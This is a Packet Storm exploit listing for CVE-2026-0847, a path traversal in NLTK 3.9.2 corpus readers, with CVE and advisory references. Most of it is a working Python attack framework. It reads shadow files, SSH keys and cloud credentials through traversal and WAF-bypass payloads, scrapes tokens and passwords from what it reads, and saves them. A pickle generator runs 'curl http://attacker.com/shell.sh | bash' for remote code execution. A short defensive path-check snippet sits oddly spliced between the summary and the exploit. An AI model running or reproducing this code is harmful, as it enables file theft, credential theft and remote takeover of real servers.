NLTK 3.9.2 Path Traversal / File Disclosure

Published: 24 Apr 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Security exploit framework for NLTK 3.9.2 path traversal and file disclosure (CVE-2026-0847).
Reporter	Title	Published	Views	Family
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in NLTK bundled with IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage	17 Jun 2026 13:55	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to a Path Traversal in NLTK [CVE-2026-0847]	14 Apr 2026 15:13	–	ibm
ATTACKERKB	CVE-2026-0847	4 Mar 2026 18:25	–	attackerkb
BDU FSTEC	The vulnerability of the CorpusReader class in the NLTK library for symbolic and statistical processing of natural language allows a hacker to read arbitrary files.	9 Jun 2026 00:00	–	bdu_fstec
Circl	CVE-2026-0847	4 Mar 2026 19:31	–	circl
CNNVD	NLTK path traversal vulnerability	4 Mar 2026 00:00	–	cnnvd
CVE	CVE-2026-0847	4 Mar 2026 18:25	–	cve
Cvelist	CVE-2026-0847 Path Traversal in nltk/nltk	4 Mar 2026 18:25	–	cvelist
Debian CVE	CVE-2026-0847	4 Mar 2026 18:25	–	debiancve
EUVD	EUVD-2026-9475	4 Mar 2026 21:32	–	euvd
==================================================================================================================================
    | # Title     : NLTK 3.9.2 Path Traversal - File Disclosure Exploit                                                              |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://pypi.org/project/nltk/                                                                                   |
    ==================================================================================================================================
    
    [+] Summary    : This script is a security research exploit framework targeting a hypothetical path traversal vulnerability in NLTK-based applications (CVE-2026-0847).
                     It is designed to demonstrate how improper file path handling in corpus readers or web APIs can lead to unauthorized file access.
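
For contrast with the improper path handling described in the summary, here is a minimal sketch of a containment check an application could run before passing a user-supplied file name to a corpus reader. The helper `resolve_inside` and the exception `UnsafePathError` are hypothetical names chosen for illustration; they are not part of NLTK, and this is not the vendor's fix.

```python
from pathlib import Path


class UnsafePathError(ValueError):
    """Raised when a requested path would resolve outside the allowed root."""


def resolve_inside(root: str, requested: str) -> Path:
    """Return the resolved path for `requested`, or raise if it leaves `root`.

    Hypothetical helper for illustration only; not an NLTK function.
    """
    root_path = Path(root).resolve()
    # Joining with an absolute `requested` discards root_path entirely,
    # so absolute inputs are caught by the containment check below.
    candidate = (root_path / requested).resolve()
    try:
        # relative_to() raises ValueError when candidate is not under root_path.
        candidate.relative_to(root_path)
    except ValueError:
        raise UnsafePathError(f"{requested!r} escapes {root_path}") from None
    return candidate
```

Resolving both the root and the candidate before comparing them means that `..` segments and symlinks are collapsed first, so the check applies to the location that would actually be opened rather than to the raw string. URL-encoded input is assumed to have been decoded by the web framework before it reaches this function.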
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import os
    import sys
    import json
    import requests
    import argparse
    import logging
    import base64
    from pathlib import Path
    from typing import List, Dict, Optional, Tuple
    from dataclasses import dataclass
    from datetime import datetime
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    @dataclass
    class ExploitResult:
        """Store exploit results"""
        target_file: str
        content: str
        success: bool
        error: str = ""
    
    class NLTKPathTraversalExploit:
        """Main exploit class for CVE-2026-0847"""
        SENSITIVE_FILES = [
            "/etc/passwd",
            "/etc/shadow",
            "/etc/group",
            "/etc/hosts",
            "/etc/hostname",
            "/etc/resolv.conf",
            "/etc/fstab",
            "/etc/crontab",
            "/etc/ssh/sshd_config",
            "/etc/ssh/ssh_config",
            "/etc/ssh/ssh_host_rsa_key",
            "/etc/ssh/ssh_host_ecdsa_key",
            "/etc/ssh/ssh_host_ed25519_key",
            "/etc/sudoers",
            "/etc/sudoers.d/",
            "/var/log/auth.log",
            "/var/log/syslog",
            "/var/log/dpkg.log",
            "/var/log/apt/history.log",
            "/var/log/apache2/access.log",
            "/var/log/apache2/error.log",
            "/var/log/nginx/access.log",
            "/var/log/nginx/error.log",
            "/var/lib/mlocate/mlocate.db",
            "/root/.bash_history",
            "/root/.ssh/id_rsa",
            "/root/.ssh/id_rsa.pub",
            "/root/.ssh/authorized_keys",
            "/.env",
            "/.git/config",
            "/.git/HEAD",
            "/config.json",
            "/config.yaml",
            "/config.yml",
            "/settings.py",
            "/settings.json",
            "/app/config.py",
            "/app/settings.py",
            "/app/secrets.py",
            "/app/.env",
            "/.aws/credentials",
            "/.aws/config",
            "/.azure/credentials",
            "/.azure/config",
            "/.google/credentials.json",
            "/.google/application_default_credentials.json",
            "/.kube/config",
            "/.docker/config.json",
            "/.npmrc",
            "/.pypirc",
            "/.netrc",
            "/.pgpass",
            "/my.cnf",
            ".my.cnf",
            "/mysql.conf",
            "C:/Windows/win.ini",
            "C:/Windows/System32/config/SAM",
            "C:/Windows/System32/config/SYSTEM",
            "C:/Windows/System32/config/SECURITY",
            "C:/Windows/System32/drivers/etc/hosts",
            "C:/Windows/System32/drivers/etc/networks",
            "C:/Windows/System32/drivers/etc/services",
            "C:/Users/Administrator/NTUser.dat",
            "C:/Users/Administrator/Desktop/flag.txt",
            "/.dockerenv",
            "/var/run/secrets/kubernetes.io/serviceaccount/token",
            "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
            "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
            "web.config",
            "appsettings.json",
            "database.yml",
            "secrets.yml",
            "credentials.yml",
            ".htaccess",
            ".htpasswd",
            "id_rsa",
            "id_dsa",
            "id_ecdsa",
            "id_ed25519",
            "ssh_host_key",
        ]
     BYPASS_PAYLOADS = [
            "etc/passwd",
            "etc//passwd",
            "etc/./passwd",
            "etc/../etc/passwd",
            "etc/....//passwd",
            "etc/..;/passwd",
            "etc/%2e%2e/passwd",
            "etc/%252e%252e/passwd",
            "etc/..%252f..%252f..%252fetc/passwd",
            "etc/..%c0%af..%c0%af..%c0%afetc/passwd",
            "etc/..%c1%9c..%c1%9c..%c1%9cetc/passwd",
            "etc/..%c0%ae%c0%ae/",
            "etc/%2e%2e%2fetc%2fpasswd",
            "etc/..%255c..%255c..%255cetc/passwd",
            "etc/..\\..\\..\\etc\\passwd",
            "etc/....//....//....//etc/passwd",
        ]
        
        def __init__(self, target_url: str = None, verbose: bool = False):
            """
            Initialize exploit
            
            Args:
                target_url: Target API endpoint (if remote)
                verbose: Enable verbose output
            """
            self.target_url = target_url
            self.verbose = verbose
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
            
        def test_local_exploit(self, target_file: str) -> ExploitResult:
            """
            Test exploit locally (direct Python import)
            
            Args:
                target_file: Path to file to read
                
            Returns:
                ExploitResult object
            """
            try:
                from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader
                from nltk.corpus.reader.util import FileSystemPathPointer
                root = FileSystemPathPointer("/")
                content = None
                reader_classes = [
                    WordListCorpusReader,
                    TaggedCorpusReader,
                    BracketParseCorpusReader
                ]
                
                for reader_class in reader_classes:
                    try:
                        reader = reader_class(root, [target_file])
                        content = reader.raw(target_file)
                        if content:
                            logger.info(f"[+] Success with {reader_class.__name__}")
                            break
                    except Exception as e:
                        if self.verbose:
                            logger.debug(f"[-] Failed with {reader_class.__name__}: {e}")
                        continue
                
                if content:
                    return ExploitResult(
                        target_file=target_file,
                        content=content,
                        success=True
                    )
                else:
                    return ExploitResult(
                        target_file=target_file,
                        content="",
                        success=False,
                        error="All readers failed"
                    )
                    
            except ImportError as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=f"NLTK not installed: {e}"
                )
            except Exception as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=str(e)
                )
        
        def test_remote_exploit(self, target_file: str, endpoint: str = "/read", method: str = "POST") -> ExploitResult:
            """
            Test exploit remotely via vulnerable API
            
            Args:
                target_file: Path to file to read
                endpoint: API endpoint
                method: HTTP method (POST/GET)
                
            Returns:
                ExploitResult object
            """
            if not self.target_url:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error="No target URL specified"
                )
            
            url = f"{self.target_url.rstrip('/')}{endpoint}"
            
            try:
                if method.upper() == "POST":
                    payload = {"file": target_file, "filename": target_file, "path": target_file}
                    response = self.session.post(url, json=payload, timeout=30)
                else:
                    response = self.session.get(url, params={"file": target_file, "path": target_file}, timeout=30)
                
                if response.status_code == 200 and response.text:
                    return ExploitResult(
                        target_file=target_file,
                        content=response.text,
                        success=True
                    )
                else:
                    return ExploitResult(
                        target_file=target_file,
                        content="",
                        success=False,
                        error=f"HTTP {response.status_code}"
                    )
                    
            except Exception as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=str(e)
                )
        
        def scan_common_files(self, use_bypass: bool = False) -> List[ExploitResult]:
            """
            Scan for common sensitive files
            
            Args:
                use_bypass: Use bypass payloads
                
            Returns:
                List of ExploitResult objects
            """
            results = []
            
            for file_path in self.SENSITIVE_FILES:
                if self.verbose:
                    logger.info(f"[*] Testing: {file_path}")
                
                result = self.test_local_exploit(file_path) if not self.target_url else self.test_remote_exploit(file_path)
                
                if result.success:
                    logger.info(f"[+] FOUND: {file_path} ({len(result.content)} bytes)")
                    results.append(result)
                    self.extract_sensitive_info(result)
                elif self.verbose:
                    logger.debug(f"[-] Not found: {file_path}")
            
            return results
        
        def extract_sensitive_info(self, result: ExploitResult) -> Dict:
            """
            Extract sensitive information from file content
            
            Args:
                result: ExploitResult object
                
            Returns:
                Dictionary of extracted info
            """
            extracted = {}
            
            content = result.content
            if "passwd" in result.target_file:
                users = []
                for line in content.split('\n'):
                    if ':' in line:
                        parts = line.split(':')
                        if len(parts) >= 3:
                            username = parts[0]
                            uid = parts[2]
                            if uid.isdigit() and int(uid) >= 1000:
                                users.append(username)
                if users:
                    extracted['users'] = users
                    logger.info(f"[!] Found users: {', '.join(users)}")
            if "id_rsa" in result.target_file or "ssh_host" in result.target_file:
                if "BEGIN OPENSSH PRIVATE KEY" in content or "BEGIN RSA PRIVATE KEY" in content:
                    extracted['ssh_key'] = content
                    logger.warning("[!!!] SSH PRIVATE KEY FOUND!")
                    key_file = f"extracted_{datetime.now().strftime('%Y%m%d_%H%M%S')}.key"
                    with open(key_file, 'w') as f:
                        f.write(content)
                    logger.info(f"[+] SSH key saved to {key_file}")
            import re
            patterns = {
                'api_key': r'[a-zA-Z0-9_-]{32,}',
                'aws_key': r'AKIA[0-9A-Z]{16}',
                'google_api': r'AIza[0-9A-Za-z_-]{35}',
                'github_token': r'gh[ps]_[0-9a-zA-Z]{36}',
                'slack_token': r'xox[baprs]-[0-9a-zA-Z-]+',
                'jwt': r'eyJ[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*',
                'password': r'password[\s]*[:=][\s]*["\']?([^"\'\s]+)["\']?',
                'secret': r'secret[\s]*[:=][\s]*["\']?([^"\'\s]+)["\']?',
            }
            
            for pattern_name, pattern in patterns.items():
                matches = re.findall(pattern, content, re.IGNORECASE)
                if matches:
                    extracted[pattern_name] = matches[:10]  # Limit to first 10
                    logger.warning(f"[!!!] Found {len(matches)} {pattern_name.upper()} tokens")
            
            return extracted
        
        def generate_exploit_payloads(self) -> List[str]:
            """
            Generate path traversal payloads for different scenarios
            
            Returns:
                List of payload strings
            """
            targets = [
                "../../../../../../etc/passwd",
                "../../../../../../etc/shadow",
                "../../../../../../root/.ssh/id_rsa",
                "../../../../../../var/log/auth.log",
                "..\\..\\..\\..\\..\\..\\Windows\\win.ini",
            ]
            
            payloads = []
            for target in targets:
                for bypass in self.BYPASS_PAYLOADS:
                    if bypass.startswith('etc'):
                        payloads.append(bypass)
                    else:
                        payloads.append(target.replace('etc/passwd', bypass))
            
            return list(set(payloads))
        
        def create_malicious_nltk_file(self, output_file: str = "malicious.nltk") -> str:
            """
            Create a malicious NLTK corpus file
            
            Args:
                output_file: Output filename
                
            Returns:
                Path to created file
            """
            import pickle
            
            # Malicious pickle payload for RCE (when combined with NLTK deserialization)
            class MaliciousPickle:
                def __reduce__(self):
                    import os
                    return (os.system, ('curl http://attacker.com/shell.sh | bash',))
            
            with open(output_file, 'wb') as f:
                pickle.dump(MaliciousPickle(), f)
            
            logger.warning(f"[!] Created malicious pickle file: {output_file}")
            logger.warning("[!] This can lead to RCE if loaded by NLTK")
            
            return output_file
    class AttackVector:
        """Different attack vectors for the vulnerability"""
        
        @staticmethod
        def flask_api_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via Flask API endpoint
            """
            logger.info(f"[*] Attacking Flask API at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.post(
                        f"{target_url}/read",
                        json={"file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}: {len(response.text)} bytes")
                        safe_name = file_path.replace('/', '_').replace('\\', '_')
                        with open(f"exfil_{safe_name}.txt", 'w') as f:
                            f.write(response.text)
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
        
        @staticmethod
        def django_api_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via Django REST API
            """
            logger.info(f"[*] Attacking Django API at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.get(
                        f"{target_url}/api/corpus/",
                        params={"file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}")
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
        
        @staticmethod
        def fastapi_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via FastAPI endpoint
            """
            logger.info(f"[*] Attacking FastAPI at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.post(
                        f"{target_url}/process",
                        json={"corpus_file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}")
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
    def main():
        parser = argparse.ArgumentParser(
            description='CVE-2026-0847 - NLTK Path Traversal Exploit',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
    
      python exploit.py --local --file /etc/passwd
      python exploit.py --local --scan
      python exploit.py --url http://target.com:8000 --file etc/passwd
      python exploit.py --url http://target.com:8000 --scan --bypass
      python exploit.py --generate-pickle malicious.nltk
            """
        )
        
        parser.add_argument('--local', action='store_true', help='Local exploit (direct Python)')
        parser.add_argument('--url', help='Target URL for remote exploit')
        parser.add_argument('--file', help='Single file to read')
        parser.add_argument('--scan', action='store_true', help='Scan common sensitive files')
        parser.add_argument('--bypass', action='store_true', help='Use WAF bypass payloads')
        parser.add_argument('--output', '-o', help='Output file for results')
        parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
        parser.add_argument('--generate-pickle', metavar='FILE', help='Generate malicious pickle file')
        parser.add_argument('--endpoint', default='/read', help='API endpoint (default: /read)')
        parser.add_argument('--method', choices=['GET', 'POST'], default='POST', help='HTTP method')
        
        args = parser.parse_args()
    
        if args.generate_pickle:
            exploit = NLTKPathTraversalExploit()
            exploit.create_malicious_nltk_file(args.generate_pickle)
            return
    
        if not args.local and not args.url:
            parser.error("Either --local or --url must be specified")
        exploit = NLTKPathTraversalExploit(
            target_url=args.url,
            verbose=args.verbose
        )
        
        results = []
        if args.file:
            logger.info(f"[*] Reading file: {args.file}")
            
            if args.local:
                result = exploit.test_local_exploit(args.file)
            else:
                result = exploit.test_remote_exploit(args.file, args.endpoint, args.method)
            
            if result.success:
                logger.info(f"[+] Success! Content length: {len(result.content)} bytes")
                print("\n" + "="*60)
                print(result.content[:2000]) 
                print("="*60)
                
                if len(result.content) > 2000:
                    print(f"\n... (truncated, total {len(result.content)} bytes)")
                
                results.append(result)
    
                if args.output:
                    with open(args.output, 'w') as f:
                        f.write(result.content)
                    logger.info(f"[+] Saved to {args.output}")
            else:
                logger.error(f"[-] Failed: {result.error}")
    
        if args.scan:
            logger.info("[*] Scanning for sensitive files...")
            
            if args.local:
                if args.bypass:
                    logger.warning("[!] Bypass mode not applicable for local exploit")
                
                files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES
                for file_path in files_to_test[:20]:  
                    result = exploit.test_local_exploit(file_path)
                    if result.success:
                        results.append(result)
                        logger.info(f"[+] Found: {file_path}")
            else:
                files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES
                if args.bypass:
                    bypass_payloads = exploit.generate_exploit_payloads()
                    for payload in bypass_payloads[:50]:
                        result = exploit.test_remote_exploit(payload, args.endpoint, args.method)
                        if result.success:
                            results.append(result)
                            logger.info(f"[+] Found with bypass: {payload}")
                else:
                    for file_path in files_to_test[:30]:
                        result = exploit.test_remote_exploit(file_path, args.endpoint, args.method)
                        if result.success:
                            results.append(result)
                            logger.info(f"[+] Found: {file_path}")
    
        if results:
            print("\n" + "="*60)
            print("EXPLOIT SUMMARY")
            print("="*60)
            print(f"Total files read: {len(results)}")
            
            for result in results:
                print(f"\n[+] {result.target_file}: {len(result.content)} bytes")
                lines = result.content.split('\n')[:5]
                for line in lines:
                    if line.strip():
                        print(f"    {line[:100]}")
    
            if args.output and args.output.endswith('.json'):
                with open(args.output, 'w') as f:
                    json.dump([
                        {
                            'file': r.target_file,
                            'size': len(r.content),
                            'content': r.content[:10000]
                        }
                        for r in results
                    ], f, indent=2)
                logger.info(f"[+] Results saved to {args.output}")
        
        else:
            logger.warning("[!] No files were successfully read")
        
        logger.info("[+] Exploit completed")
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
Scores as of 24 Apr 2026 00:00 (current):
Vulners AI Score: 5.4 (Medium risk)
CVSS 3.1: 7.5
CVSS 3: 8.6
EPSS: 0.00924